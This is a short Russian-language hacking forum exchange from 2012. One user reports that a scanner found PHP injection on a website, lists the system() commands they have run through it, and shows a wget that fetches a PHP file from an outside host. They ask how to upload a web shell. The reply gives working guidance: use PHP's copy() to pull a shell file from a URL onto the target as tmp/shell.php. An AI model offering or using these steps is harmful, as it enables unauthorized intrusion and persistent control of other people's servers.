06.11.2012, 23:06
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Sat-hacker
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')
воспользуйся пхп функцией copy();
пример:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://localhost/shell.txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"tmp/shell.php"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|